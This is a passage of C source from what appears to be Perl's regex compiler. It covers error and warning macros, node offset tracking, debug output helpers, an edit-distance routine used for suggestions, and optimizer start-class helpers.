* xI = tI + (xC - tC)
*
* When the substitute parse is constructed, the code needs to set:
* RExC_start (sC)
* RExC_end (eC)
* RExC_copy_start_in_input (tI)
* RExC_copy_start_in_constructed (tC)
* and restore them when done.
*
* During normal processing of the input pattern, both
* 'RExC_copy_start_in_input' and 'RExC_copy_start_in_constructed' are set to
* sI, so that xC equals xI.
*/
#define sI RExC_precomp
#define eI RExC_precomp_end
#define sC RExC_start
#define eC RExC_end
#define tI RExC_copy_start_in_input
#define tC RExC_copy_start_in_constructed
#define xI(xC) (tI + (xC - tC))
#define xI_offset(xC) (xI(xC) - sI)
#define REPORT_LOCATION_ARGS(xC) \
UTF8fARG(UTF, \
(xI(xC) > eI) /* Don't run off end */ \
? eI - sI /* Length before the <--HERE */ \
: ((xI_offset(xC) >= 0) \
? xI_offset(xC) \
: (Perl_croak(aTHX_ "panic: %s: %d: negative offset: %" \
IVdf " trying to output message for " \
" pattern %.*s", \
__FILE__, __LINE__, (IV) xI_offset(xC), \
((int) (eC - sC)), sC), 0)), \
sI), /* The input pattern printed up to the <--HERE */ \
UTF8fARG(UTF, \
(xI(xC) > eI) ? 0 : eI - xI(xC), /* Length after <--HERE */ \
(xI(xC) > eI) ? eI : xI(xC)) /* pattern after <--HERE */
/* Used to point after bad bytes for an error message, but avoid skipping
* past a nul byte. */
#define SKIP_IF_CHAR(s, e) (!*(s) ? 0 : UTF ? UTF8_SAFE_SKIP(s, e) : 1)
/* Set up to clean up after our imminent demise */
#define PREPARE_TO_DIE \
STMT_START { \
if (RExC_rx_sv) \
SAVEFREESV(RExC_rx_sv); \
if (RExC_open_parens) \
SAVEFREEPV(RExC_open_parens); \
if (RExC_close_parens) \
SAVEFREEPV(RExC_close_parens); \
} STMT_END
/*
* Calls SAVEDESTRUCTOR_X if needed, then calls Perl_croak with the given
* arg. Show regex, up to a maximum length. If it's too long, chop and add
* "...".
*/
#define _FAIL(code) STMT_START { \
const char *ellipses = ""; \
IV len = RExC_precomp_end - RExC_precomp; \
\
PREPARE_TO_DIE; \
if (len > RegexLengthToShowInErrorMessages) { \
/* chop 10 shorter than the max, to ensure meaning of "..." */ \
len = RegexLengthToShowInErrorMessages - 10; \
ellipses = "..."; \
} \
code; \
} STMT_END
#define FAIL(msg) _FAIL( \
Perl_croak(aTHX_ "%s in regex m/%" UTF8f "%s/", \
msg, UTF8fARG(UTF, len, RExC_precomp), ellipses))
#define FAIL2(msg,arg) _FAIL( \
Perl_croak(aTHX_ msg " in regex m/%" UTF8f "%s/", \
arg, UTF8fARG(UTF, len, RExC_precomp), ellipses))
/*
* Simple_vFAIL -- like FAIL, but marks the current location in the scan
*/
#define Simple_vFAIL(m) STMT_START { \
Perl_croak(aTHX_ "%s" REPORT_LOCATION, \
m, REPORT_LOCATION_ARGS(RExC_parse)); \
} STMT_END
/*
* Calls SAVEDESTRUCTOR_X if needed, then Simple_vFAIL()
*/
#define vFAIL(m) STMT_START { \
PREPARE_TO_DIE; \
Simple_vFAIL(m); \
} STMT_END
/*
* Like Simple_vFAIL(), but accepts two arguments.
*/
#define Simple_vFAIL2(m,a1) STMT_START { \
S_re_croak2(aTHX_ UTF, m, REPORT_LOCATION, a1, \
REPORT_LOCATION_ARGS(RExC_parse)); \
} STMT_END
/*
* Calls SAVEDESTRUCTOR_X if needed, then Simple_vFAIL2().
*/
#define vFAIL2(m,a1) STMT_START { \
PREPARE_TO_DIE; \
Simple_vFAIL2(m, a1); \
} STMT_END
/*
* Like Simple_vFAIL(), but accepts three arguments.
*/
#define Simple_vFAIL3(m, a1, a2) STMT_START { \
S_re_croak2(aTHX_ UTF, m, REPORT_LOCATION, a1, a2, \
REPORT_LOCATION_ARGS(RExC_parse)); \
} STMT_END
/*
* Calls SAVEDESTRUCTOR_X if needed, then Simple_vFAIL3().
*/
#define vFAIL3(m,a1,a2) STMT_START { \
PREPARE_TO_DIE; \
Simple_vFAIL3(m, a1, a2); \
} STMT_END
/*
* Like Simple_vFAIL(), but accepts four arguments.
*/
#define Simple_vFAIL4(m, a1, a2, a3) STMT_START { \
S_re_croak2(aTHX_ UTF, m, REPORT_LOCATION, a1, a2, a3, \
REPORT_LOCATION_ARGS(RExC_parse)); \
} STMT_END
#define vFAIL4(m,a1,a2,a3) STMT_START { \
PREPARE_TO_DIE; \
Simple_vFAIL4(m, a1, a2, a3); \
} STMT_END
/* A specialized version of vFAIL2 that works with UTF8f */
#define vFAIL2utf8f(m, a1) STMT_START { \
PREPARE_TO_DIE; \
S_re_croak2(aTHX_ UTF, m, REPORT_LOCATION, a1, \
REPORT_LOCATION_ARGS(RExC_parse)); \
} STMT_END
#define vFAIL3utf8f(m, a1, a2) STMT_START { \
PREPARE_TO_DIE; \
S_re_croak2(aTHX_ UTF, m, REPORT_LOCATION, a1, a2, \
REPORT_LOCATION_ARGS(RExC_parse)); \
} STMT_END
/* Setting this to NULL is a signal to not output warnings */
#define TURN_OFF_WARNINGS_IN_SUBSTITUTE_PARSE \
STMT_START { \
RExC_save_copy_start_in_constructed = RExC_copy_start_in_constructed;\
RExC_copy_start_in_constructed = NULL; \
} STMT_END
#define RESTORE_WARNINGS \
RExC_copy_start_in_constructed = RExC_save_copy_start_in_constructed
/* Since a warning can be generated multiple times as the input is reparsed, we
* output it the first time we come to that point in the parse, but suppress it
* otherwise. 'RExC_copy_start_in_constructed' being NULL is a flag to not
* generate any warnings */
#define TO_OUTPUT_WARNINGS(loc) \
( RExC_copy_start_in_constructed \
&& ((xI(loc)) - RExC_precomp) > (Ptrdiff_t) RExC_latest_warn_offset)
/* After we've emitted a warning, we save the position in the input so we don't
* output it again */
#define UPDATE_WARNINGS_LOC(loc) \
STMT_START { \
if (TO_OUTPUT_WARNINGS(loc)) { \
RExC_latest_warn_offset = MAX(sI, MIN(eI, xI(loc))) \
- RExC_precomp; \
} \
} STMT_END
/* 'warns' is the output of the packWARNx macro used in 'code' */
#define _WARN_HELPER(loc, warns, code) \
STMT_START { \
if (! RExC_copy_start_in_constructed) { \
Perl_croak( aTHX_ "panic! %s: %d: Tried to warn when none" \
" expected at '%s'", \
__FILE__, __LINE__, loc); \
} \
if (TO_OUTPUT_WARNINGS(loc)) { \
if (ckDEAD(warns)) \
PREPARE_TO_DIE; \
code; \
UPDATE_WARNINGS_LOC(loc); \
} \
} STMT_END
/* m is not necessarily a "literal string", in this macro */
#define reg_warn_non_literal_string(loc, m) \
_WARN_HELPER(loc, packWARN(WARN_REGEXP), \
Perl_warner(aTHX_ packWARN(WARN_REGEXP), \
"%s" REPORT_LOCATION, \
m, REPORT_LOCATION_ARGS(loc)))
#define ckWARNreg(loc,m) \
_WARN_HELPER(loc, packWARN(WARN_REGEXP), \
Perl_ck_warner(aTHX_ packWARN(WARN_REGEXP), \
m REPORT_LOCATION, \
REPORT_LOCATION_ARGS(loc)))
#define vWARN(loc, m) \
_WARN_HELPER(loc, packWARN(WARN_REGEXP), \
Perl_warner(aTHX_ packWARN(WARN_REGEXP), \
m REPORT_LOCATION, \
REPORT_LOCATION_ARGS(loc)))
#define vWARN_dep(loc, m) \
_WARN_HELPER(loc, packWARN(WARN_DEPRECATED), \
Perl_warner(aTHX_ packWARN(WARN_DEPRECATED), \
m REPORT_LOCATION, \
REPORT_LOCATION_ARGS(loc)))
#define ckWARNdep(loc,m) \
_WARN_HELPER(loc, packWARN(WARN_DEPRECATED), \
Perl_ck_warner_d(aTHX_ packWARN(WARN_DEPRECATED), \
m REPORT_LOCATION, \
REPORT_LOCATION_ARGS(loc)))
#define ckWARNregdep(loc,m) \
_WARN_HELPER(loc, packWARN2(WARN_DEPRECATED, WARN_REGEXP), \
Perl_ck_warner_d(aTHX_ packWARN2(WARN_DEPRECATED, \
WARN_REGEXP), \
m REPORT_LOCATION, \
REPORT_LOCATION_ARGS(loc)))
#define ckWARN2reg_d(loc,m, a1) \
_WARN_HELPER(loc, packWARN(WARN_REGEXP), \
Perl_ck_warner_d(aTHX_ packWARN(WARN_REGEXP), \
m REPORT_LOCATION, \
a1, REPORT_LOCATION_ARGS(loc)))
#define ckWARN2reg(loc, m, a1) \
_WARN_HELPER(loc, packWARN(WARN_REGEXP), \
Perl_ck_warner(aTHX_ packWARN(WARN_REGEXP), \
m REPORT_LOCATION, \
a1, REPORT_LOCATION_ARGS(loc)))
#define vWARN3(loc, m, a1, a2) \
_WARN_HELPER(loc, packWARN(WARN_REGEXP), \
Perl_warner(aTHX_ packWARN(WARN_REGEXP), \
m REPORT_LOCATION, \
a1, a2, REPORT_LOCATION_ARGS(loc)))
#define ckWARN3reg(loc, m, a1, a2) \
_WARN_HELPER(loc, packWARN(WARN_REGEXP), \
Perl_ck_warner(aTHX_ packWARN(WARN_REGEXP), \
m REPORT_LOCATION, \
a1, a2, \
REPORT_LOCATION_ARGS(loc)))
#define vWARN4(loc, m, a1, a2, a3) \
_WARN_HELPER(loc, packWARN(WARN_REGEXP), \
Perl_warner(aTHX_ packWARN(WARN_REGEXP), \
m REPORT_LOCATION, \
a1, a2, a3, \
REPORT_LOCATION_ARGS(loc)))
#define ckWARN4reg(loc, m, a1, a2, a3) \
_WARN_HELPER(loc, packWARN(WARN_REGEXP), \
Perl_ck_warner(aTHX_ packWARN(WARN_REGEXP), \
m REPORT_LOCATION, \
a1, a2, a3, \
REPORT_LOCATION_ARGS(loc)))
#define vWARN5(loc, m, a1, a2, a3, a4) \
_WARN_HELPER(loc, packWARN(WARN_REGEXP), \
Perl_warner(aTHX_ packWARN(WARN_REGEXP), \
m REPORT_LOCATION, \
a1, a2, a3, a4, \
REPORT_LOCATION_ARGS(loc)))
#define ckWARNexperimental(loc, class, m) \
_WARN_HELPER(loc, packWARN(class), \
Perl_ck_warner_d(aTHX_ packWARN(class), \
m REPORT_LOCATION, \
REPORT_LOCATION_ARGS(loc)))
/* Convert between a pointer to a node and its offset from the beginning of the
* program */
#define REGNODE_p(offset) (RExC_emit_start + (offset))
#define REGNODE_OFFSET(node) ((node) - RExC_emit_start)
/* Macros for recording node offsets. 20001227 mjd@plover.com
* Nodes are numbered 1, 2, 3, 4. Node #n's position is recorded in
 * element 2*n-1 of the array. Element #2n holds the byte length of node #n.
* Element 0 holds the number n.
* Position is 1 indexed.
*/
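/* For example, node #3's byte position is stored in RExC_offsets[5] (2*3-1)
 * and its length in RExC_offsets[6] (2*3); RExC_offsets[0] holds the count
 * (see ProgLen below). */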
#ifndef RE_TRACK_PATTERN_OFFSETS
#define Set_Node_Offset_To_R(offset,byte)
#define Set_Node_Offset(node,byte)
#define Set_Cur_Node_Offset
#define Set_Node_Length_To_R(node,len)
#define Set_Node_Length(node,len)
#define Set_Node_Cur_Length(node,start)
#define Node_Offset(n)
#define Node_Length(n)
#define Set_Node_Offset_Length(node,offset,len)
#define ProgLen(ri) ri->u.proglen
#define SetProgLen(ri,x) ri->u.proglen = x
#define Track_Code(code)
#else
#define ProgLen(ri) ri->u.offsets[0]
#define SetProgLen(ri,x) ri->u.offsets[0] = x
#define Set_Node_Offset_To_R(offset,byte) STMT_START { \
MJD_OFFSET_DEBUG(("** (%d) offset of node %d is %d.\n", \
__LINE__, (int)(offset), (int)(byte))); \
if((offset) < 0) { \
Perl_croak(aTHX_ "value of node is %d in Offset macro", \
(int)(offset)); \
} else { \
RExC_offsets[2*(offset)-1] = (byte); \
} \
} STMT_END
#define Set_Node_Offset(node,byte) \
Set_Node_Offset_To_R(REGNODE_OFFSET(node), (byte)-RExC_start)
#define Set_Cur_Node_Offset Set_Node_Offset(RExC_emit, RExC_parse)
#define Set_Node_Length_To_R(node,len) STMT_START { \
MJD_OFFSET_DEBUG(("** (%d) size of node %d is %d.\n", \
__LINE__, (int)(node), (int)(len))); \
if((node) < 0) { \
Perl_croak(aTHX_ "value of node is %d in Length macro", \
(int)(node)); \
} else { \
RExC_offsets[2*(node)] = (len); \
} \
} STMT_END
#define Set_Node_Length(node,len) \
Set_Node_Length_To_R(REGNODE_OFFSET(node), len)
#define Set_Node_Cur_Length(node, start) \
Set_Node_Length(node, RExC_parse - start)
/* Get offsets and lengths */
#define Node_Offset(n) (RExC_offsets[2*(REGNODE_OFFSET(n))-1])
#define Node_Length(n) (RExC_offsets[2*(REGNODE_OFFSET(n))])
#define Set_Node_Offset_Length(node,offset,len) STMT_START { \
Set_Node_Offset_To_R(REGNODE_OFFSET(node), (offset)); \
Set_Node_Length_To_R(REGNODE_OFFSET(node), (len)); \
} STMT_END
#define Track_Code(code) STMT_START { code } STMT_END
#endif
#if PERL_ENABLE_EXPERIMENTAL_REGEX_OPTIMISATIONS
#define EXPERIMENTAL_INPLACESCAN
#endif /*PERL_ENABLE_EXPERIMENTAL_REGEX_OPTIMISATIONS*/
#ifdef DEBUGGING
int
Perl_re_printf(pTHX_ const char *fmt, ...)
{
va_list ap;
int result;
PerlIO *f= Perl_debug_log;
PERL_ARGS_ASSERT_RE_PRINTF;
va_start(ap, fmt);
result = PerlIO_vprintf(f, fmt, ap);
va_end(ap);
return result;
}
int
Perl_re_indentf(pTHX_ const char *fmt, U32 depth, ...)
{
va_list ap;
int result;
PerlIO *f= Perl_debug_log;
PERL_ARGS_ASSERT_RE_INDENTF;
va_start(ap, depth);
PerlIO_printf(f, "%*s", ( (int)depth % 20 ) * 2, "");
result = PerlIO_vprintf(f, fmt, ap);
va_end(ap);
return result;
}
#endif /* DEBUGGING */
#define DEBUG_RExC_seen() \
DEBUG_OPTIMISE_MORE_r({ \
Perl_re_printf( aTHX_ "RExC_seen: "); \
\
if (RExC_seen & REG_ZERO_LEN_SEEN) \
Perl_re_printf( aTHX_ "REG_ZERO_LEN_SEEN "); \
\
if (RExC_seen & REG_LOOKBEHIND_SEEN) \
Perl_re_printf( aTHX_ "REG_LOOKBEHIND_SEEN "); \
\
if (RExC_seen & REG_GPOS_SEEN) \
Perl_re_printf( aTHX_ "REG_GPOS_SEEN "); \
\
if (RExC_seen & REG_RECURSE_SEEN) \
Perl_re_printf( aTHX_ "REG_RECURSE_SEEN "); \
\
if (RExC_seen & REG_TOP_LEVEL_BRANCHES_SEEN) \
Perl_re_printf( aTHX_ "REG_TOP_LEVEL_BRANCHES_SEEN "); \
\
if (RExC_seen & REG_VERBARG_SEEN) \
Perl_re_printf( aTHX_ "REG_VERBARG_SEEN "); \
\
if (RExC_seen & REG_CUTGROUP_SEEN) \
Perl_re_printf( aTHX_ "REG_CUTGROUP_SEEN "); \
\
if (RExC_seen & REG_RUN_ON_COMMENT_SEEN) \
Perl_re_printf( aTHX_ "REG_RUN_ON_COMMENT_SEEN "); \
\
if (RExC_seen & REG_UNFOLDED_MULTI_SEEN) \
Perl_re_printf( aTHX_ "REG_UNFOLDED_MULTI_SEEN "); \
\
if (RExC_seen & REG_UNBOUNDED_QUANTIFIER_SEEN) \
Perl_re_printf( aTHX_ "REG_UNBOUNDED_QUANTIFIER_SEEN "); \
\
Perl_re_printf( aTHX_ "\n"); \
});
#define DEBUG_SHOW_STUDY_FLAG(flags,flag) \
if ((flags) & flag) Perl_re_printf( aTHX_ "%s ", #flag)
#ifdef DEBUGGING
static void
S_debug_show_study_flags(pTHX_ U32 flags, const char *open_str,
const char *close_str)
{
if (!flags)
return;
Perl_re_printf( aTHX_ "%s", open_str);
DEBUG_SHOW_STUDY_FLAG(flags, SF_BEFORE_SEOL);
DEBUG_SHOW_STUDY_FLAG(flags, SF_BEFORE_MEOL);
DEBUG_SHOW_STUDY_FLAG(flags, SF_IS_INF);
DEBUG_SHOW_STUDY_FLAG(flags, SF_HAS_PAR);
DEBUG_SHOW_STUDY_FLAG(flags, SF_IN_PAR);
DEBUG_SHOW_STUDY_FLAG(flags, SF_HAS_EVAL);
DEBUG_SHOW_STUDY_FLAG(flags, SCF_DO_SUBSTR);
DEBUG_SHOW_STUDY_FLAG(flags, SCF_DO_STCLASS_AND);
DEBUG_SHOW_STUDY_FLAG(flags, SCF_DO_STCLASS_OR);
DEBUG_SHOW_STUDY_FLAG(flags, SCF_DO_STCLASS);
DEBUG_SHOW_STUDY_FLAG(flags, SCF_WHILEM_VISITED_POS);
DEBUG_SHOW_STUDY_FLAG(flags, SCF_TRIE_RESTUDY);
DEBUG_SHOW_STUDY_FLAG(flags, SCF_SEEN_ACCEPT);
DEBUG_SHOW_STUDY_FLAG(flags, SCF_TRIE_DOING_RESTUDY);
DEBUG_SHOW_STUDY_FLAG(flags, SCF_IN_DEFINE);
Perl_re_printf( aTHX_ "%s", close_str);
}
static void
S_debug_studydata(pTHX_ const char *where, scan_data_t *data,
U32 depth, int is_inf)
{
GET_RE_DEBUG_FLAGS_DECL;
DEBUG_OPTIMISE_MORE_r({
if (!data)
return;
Perl_re_indentf(aTHX_ "%s: Pos:%" IVdf "/%" IVdf " Flags: 0x%" UVXf,
depth,
where,
(IV)data->pos_min,
(IV)data->pos_delta,
(UV)data->flags
);
S_debug_show_study_flags(aTHX_ data->flags," [","]");
Perl_re_printf( aTHX_
" Whilem_c: %" IVdf " Lcp: %" IVdf " %s",
(IV)data->whilem_c,
(IV)(data->last_closep ? *((data)->last_closep) : -1),
is_inf ? "INF " : ""
);
if (data->last_found) {
int i;
Perl_re_printf(aTHX_
"Last:'%s' %" IVdf ":%" IVdf "/%" IVdf,
SvPVX_const(data->last_found),
(IV)data->last_end,
(IV)data->last_start_min,
(IV)data->last_start_max
);
for (i = 0; i < 2; i++) {
Perl_re_printf(aTHX_
" %s%s: '%s' @ %" IVdf "/%" IVdf,
data->cur_is_floating == i ? "*" : "",
i ? "Float" : "Fixed",
SvPVX_const(data->substrs[i].str),
(IV)data->substrs[i].min_offset,
(IV)data->substrs[i].max_offset
);
S_debug_show_study_flags(aTHX_ data->substrs[i].flags," [","]");
}
}
Perl_re_printf( aTHX_ "\n");
});
}
static void
S_debug_peep(pTHX_ const char *str, const RExC_state_t *pRExC_state,
regnode *scan, U32 depth, U32 flags)
{
GET_RE_DEBUG_FLAGS_DECL;
DEBUG_OPTIMISE_r({
regnode *Next;
if (!scan)
return;
Next = regnext(scan);
regprop(RExC_rx, RExC_mysv, scan, NULL, pRExC_state);
Perl_re_indentf( aTHX_ "%s>%3d: %s (%d)",
depth,
str,
REG_NODE_NUM(scan), SvPV_nolen_const(RExC_mysv),
Next ? (REG_NODE_NUM(Next)) : 0 );
S_debug_show_study_flags(aTHX_ flags," [ ","]");
Perl_re_printf( aTHX_ "\n");
});
}
# define DEBUG_STUDYDATA(where, data, depth, is_inf) \
S_debug_studydata(aTHX_ where, data, depth, is_inf)
# define DEBUG_PEEP(str, scan, depth, flags) \
S_debug_peep(aTHX_ str, pRExC_state, scan, depth, flags)
#else
# define DEBUG_STUDYDATA(where, data, depth, is_inf) NOOP
# define DEBUG_PEEP(str, scan, depth, flags) NOOP
#endif
/* =========================================================
* BEGIN edit_distance stuff.
*
* This calculates how many single character changes of any type are needed to
* transform a string into another one. It is taken from version 3.1 of
*
* https://metacpan.org/pod/Text::Levenshtein::Damerau::XS
*/
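/* As a quick illustration: under this metric "ehllo" is at distance 1 from
 * "hello" (a single adjacent transposition), where plain Levenshtein would
 * charge 2 edits for the same pair. */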
/* Our unsorted dictionary linked list. */
/* Note we use UVs, not chars. */
struct dictionary{
UV key;
UV value;
struct dictionary* next;
};
typedef struct dictionary item;
PERL_STATIC_INLINE item*
push(UV key, item* curr)
{
item* head;
Newx(head, 1, item);
head->key = key;
head->value = 0;
head->next = curr;
return head;
}
PERL_STATIC_INLINE item*
find(item* head, UV key)
{
item* iterator = head;
while (iterator){
if (iterator->key == key){
return iterator;
}
iterator = iterator->next;
}
return NULL;
}
PERL_STATIC_INLINE item*
uniquePush(item* head, UV key)
{
item* iterator = head;
while (iterator){
if (iterator->key == key) {
return head;
}
iterator = iterator->next;
}
return push(key, head);
}
PERL_STATIC_INLINE void
dict_free(item* head)
{
item* iterator = head;
while (iterator) {
item* temp = iterator;
iterator = iterator->next;
Safefree(temp);
}
head = NULL;
}
/* End of Dictionary Stuff */
/* All calculations/work are done here */
STATIC int
S_edit_distance(const UV* src,
const UV* tgt,
const STRLEN x, /* length of src[] */
const STRLEN y, /* length of tgt[] */
const SSize_t maxDistance
)
{
item *head = NULL;
UV swapCount, swapScore, targetCharCount, i, j;
UV *scores;
UV score_ceil = x + y;
PERL_ARGS_ASSERT_EDIT_DISTANCE;
/* initialize matrix start values */
Newx(scores, ( (x + 2) * (y + 2)), UV);
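/* 'scores' is a flattened (x + 2) x (y + 2) matrix: row r, column c is
 * stored at scores[r * (y + 2) + c]; the leading rows/columns hold the
 * boundary values set up below. */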
scores[0] = score_ceil;
scores[1 * (y + 2) + 0] = score_ceil;
scores[0 * (y + 2) + 1] = score_ceil;
scores[1 * (y + 2) + 1] = 0;
head = uniquePush(uniquePush(head, src[0]), tgt[0]);
/* work loops */
/* i = src index */
/* j = tgt index */
for (i=1;i<=x;i++) {
if (i < x)
head = uniquePush(head, src[i]);
scores[(i+1) * (y + 2) + 1] = i;
scores[(i+1) * (y + 2) + 0] = score_ceil;
swapCount = 0;
for (j=1;j<=y;j++) {
if (i == 1) {
if(j < y)
head = uniquePush(head, tgt[j]);
scores[1 * (y + 2) + (j + 1)] = j;
scores[0 * (y + 2) + (j + 1)] = score_ceil;
}
targetCharCount = find(head, tgt[j-1])->value;
swapScore = scores[targetCharCount * (y + 2) + swapCount] + i - targetCharCount - 1 + j - swapCount;
if (src[i-1] != tgt[j-1]){
scores[(i+1) * (y + 2) + (j + 1)] = MIN(swapScore,(MIN(scores[i * (y + 2) + j], MIN(scores[(i+1) * (y + 2) + j], scores[i * (y + 2) + (j + 1)])) + 1));
}
else {
swapCount = j;
scores[(i+1) * (y + 2) + (j + 1)] = MIN(scores[i * (y + 2) + j], swapScore);
}
}
find(head, src[i-1])->value = i;
}
{
IV score = scores[(x+1) * (y + 2) + (y + 1)];
dict_free(head);
Safefree(scores);
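/* A negative result means the computed distance exceeded the caller-supplied
 * maxDistance cap (a cap of 0 means "no limit"). */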
return (maxDistance != 0 && maxDistance < score)?(-1):score;
}
}
/* END of edit_distance() stuff
* ========================================================= */
/* is c a control character for which we have a mnemonic? */
#define isMNEMONIC_CNTRL(c) _IS_MNEMONIC_CNTRL_ONLY_FOR_USE_BY_REGCOMP_DOT_C(c)
STATIC const char *
S_cntrl_to_mnemonic(const U8 c)
{
/* Returns the mnemonic string that represents character 'c', if one
* exists; NULL otherwise. The only ones that exist for the purposes of
* this routine are a few control characters */
switch (c) {
case '\a': return "\\a";
case '\b': return "\\b";
case ESC_NATIVE: return "\\e";
case '\f': return "\\f";
case '\n': return "\\n";
case '\r': return "\\r";
case '\t': return "\\t";
}
return NULL;
}
/* Mark that we cannot extend a found fixed substring at this point.
Update the longest found anchored substring or the longest found
floating substrings if needed. */
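/* Editorial illustration (not from the original sources): for a pattern like
 * /foo\d+bar/ the optimizer ends up with "foo" as the anchored (fixed-offset)
 * substring and "bar" as the floating substring, since the \d+ in between
 * makes bar's offset variable. scan_commit() is what records each such
 * candidate into data->substrs[] when scanning can no longer extend it. */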
STATIC void
S_scan_commit(pTHX_ const RExC_state_t *pRExC_state, scan_data_t *data,
SSize_t *minlenp, int is_inf)
{
const STRLEN l = CHR_SVLEN(data->last_found);
SV * const longest_sv = data->substrs[data->cur_is_floating].str;
const STRLEN old_l = CHR_SVLEN(longest_sv);
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_SCAN_COMMIT;
if ((l >= old_l) && ((l > old_l) || (data->flags & SF_BEFORE_EOL))) {
const U8 i = data->cur_is_floating;
SvSetMagicSV(longest_sv, data->last_found);
data->substrs[i].min_offset = l ? data->last_start_min : data->pos_min;
if (!i) /* fixed */
data->substrs[0].max_offset = data->substrs[0].min_offset;
else { /* float */
data->substrs[1].max_offset = (l
? data->last_start_max
: (data->pos_delta > SSize_t_MAX - data->pos_min
? SSize_t_MAX
: data->pos_min + data->pos_delta));
if (is_inf
|| (STRLEN)data->substrs[1].max_offset > (STRLEN)SSize_t_MAX)
data->substrs[1].max_offset = SSize_t_MAX;
}
if (data->flags & SF_BEFORE_EOL)
data->substrs[i].flags |= (data->flags & SF_BEFORE_EOL);
else
data->substrs[i].flags &= ~SF_BEFORE_EOL;
data->substrs[i].minlenp = minlenp;
data->substrs[i].lookbehind = 0;
}
SvCUR_set(data->last_found, 0);
{
SV * const sv = data->last_found;
if (SvUTF8(sv) && SvMAGICAL(sv)) {
MAGIC * const mg = mg_find(sv, PERL_MAGIC_utf8);
if (mg)
mg->mg_len = 0;
}
}
data->last_end = -1;
data->flags &= ~SF_BEFORE_EOL;
DEBUG_STUDYDATA("commit", data, 0, is_inf);
}
/* An SSC is just a regnode_charclass_posix with an extra field: the inversion
* list that describes which code points it matches */
STATIC void
S_ssc_anything(pTHX_ regnode_ssc *ssc)
{
/* Set the SSC 'ssc' to match an empty string or any code point */
PERL_ARGS_ASSERT_SSC_ANYTHING;
assert(is_ANYOF_SYNTHETIC(ssc));
/* mortalize so won't leak */
ssc->invlist = sv_2mortal(_add_range_to_invlist(NULL, 0, UV_MAX));
ANYOF_FLAGS(ssc) |= SSC_MATCHES_EMPTY_STRING; /* Plus matches empty */
}
STATIC int
S_ssc_is_anything(const regnode_ssc *ssc)
{
/* Returns TRUE if the SSC 'ssc' can match the empty string and any code
* point; FALSE otherwise. Thus, this is used to see if using 'ssc' buys
* us anything: if the function returns TRUE, 'ssc' hasn't been restricted
* in any way, so there's no point in using it */
UV start, end;
bool ret;
PERL_ARGS_ASSERT_SSC_IS_ANYTHING;
assert(is_ANYOF_SYNTHETIC(ssc));
if (! (ANYOF_FLAGS(ssc) & SSC_MATCHES_EMPTY_STRING)) {
return FALSE;
}
/* See if the list consists solely of the range 0 - Infinity */
invlist_iterinit(ssc->invlist);
ret = invlist_iternext(ssc->invlist, &start, &end)
&& start == 0
&& end == UV_MAX;
invlist_iterfinish(ssc->invlist);
if (ret) {
return TRUE;
}
/* If e.g., both \w and \W are set, matches everything */
if (ANYOF_POSIXL_SSC_TEST_ANY_SET(ssc)) {
int i;
for (i = 0; i < ANYOF_POSIXL_MAX; i += 2) {
if (ANYOF_POSIXL_TEST(ssc, i) && ANYOF_POSIXL_TEST(ssc, i+1)) {
return TRUE;
}
}
}
return FALSE;
}
STATIC void
S_ssc_init(pTHX_ const RExC_state_t *pRExC_state, regnode_ssc *ssc)
{
/* Initializes the SSC 'ssc'. This includes setting it to match an empty
* string, any code point, or any posix class under locale */
PERL_ARGS_ASSERT_SSC_INIT;
Zero(ssc, 1, regnode_ssc);
set_ANYOF_SYNTHETIC(ssc);
ARG_SET(ssc, ANYOF_ONLY_HAS_BITMAP);
ssc_anything(ssc);
/* If any portion of the regex is to operate under locale rules that aren't
* fully known at compile time, initialization includes it. The reason
* this isn't done for all regexes is that the optimizer was written under
* the assumption that locale was all-or-nothing. Given the complexity of
* the optimizer, its lack of documentation, the inadequate test cases for
* locale, and the fact that many parts of it may not work properly, it is
* safest to avoid locale unless necessary. */
if (RExC_contains_locale) {
ANYOF_POSIXL_SETALL(ssc);
}
else {
ANYOF_POSIXL_ZERO(ssc);
}
}
STATIC int
S_ssc_is_cp_posixl_init(const RExC_state_t *pRExC_state,
const regnode_ssc *ssc)
{
/* Returns TRUE if the SSC 'ssc' is in its initial state with regard only
* to the list of code points matched and the locale posix classes; it does
* not check the flags */
UV start, end;
bool ret;
PERL_ARGS_ASSERT_SSC_IS_CP_POSIXL_INIT;
assert(is_ANYOF_SYNTHETIC(ssc));
invlist_iterinit(ssc->invlist);
ret = invlist_iternext(ssc->invlist, &start, &end)
&& start == 0
&& end == UV_MAX;
invlist_iterfinish(ssc->invlist);
if (! ret) {
return FALSE;
}
if (RExC_contains_locale && ! ANYOF_POSIXL_SSC_TEST_ALL_SET(ssc)) {
return FALSE;
}
return TRUE;
}
#define INVLIST_INDEX 0
#define ONLY_LOCALE_MATCHES_INDEX 1
#define DEFERRED_USER_DEFINED_INDEX 2
STATIC SV*
S_get_ANYOF_cp_list_for_ssc(pTHX_ const RExC_state_t *pRExC_state,
const regnode_charclass* const node)
{
/* Returns a mortal inversion list defining which code points are matched
* by 'node', which is of type ANYOF. Handles complementing the result if
* appropriate. If some code points aren't knowable at this time, the
* returned list must, and will, contain every code point that is a
* possibility. */
dVAR;
SV* invlist = NULL;
SV* only_utf8_locale_invlist = NULL;
unsigned int i;
const U32 n = ARG(node);
bool new_node_has_latin1 = FALSE;
const U8 flags = OP(node) == ANYOFH ? 0 : ANYOF_FLAGS(node);
PERL_ARGS_ASSERT_GET_ANYOF_CP_LIST_FOR_SSC;
/* Look at the data structure created by S_set_ANYOF_arg() */
if (n != ANYOF_ONLY_HAS_BITMAP) {
SV * const rv = MUTABLE_SV(RExC_rxi->data->data[n]);
AV * const av = MUTABLE_AV(SvRV(rv));
SV **const ary = AvARRAY(av);
assert(RExC_rxi->data->what[n] == 's');
if (av_tindex_skip_len_mg(av) >= DEFERRED_USER_DEFINED_INDEX) {
/* Here there are things that won't be known until runtime -- we
* have to assume it could be anything */
invlist = sv_2mortal(_new_invlist(1));
return _add_range_to_invlist(invlist, 0, UV_MAX);
}
else if (ary[INVLIST_INDEX]) {
/* Use the node's inversion list */
invlist = sv_2mortal(invlist_clone(ary[INVLIST_INDEX], NULL));
}
/* Get the code points valid only under UTF-8 locales */
if ( (flags & ANYOFL_FOLD)
&& av_tindex_skip_len_mg(av) >= ONLY_LOCALE_MATCHES_INDEX)
{
only_utf8_locale_invlist = ary[ONLY_LOCALE_MATCHES_INDEX];
}
}
if (! invlist) {
invlist = sv_2mortal(_new_invlist(0));
}
/* An ANYOF node contains a bitmap for the first NUM_ANYOF_CODE_POINTS
* code points, and an inversion list for the others, but if there are code
* points that should match only conditionally on the target string being
* UTF-8, those are placed in the inversion list, and not the bitmap.
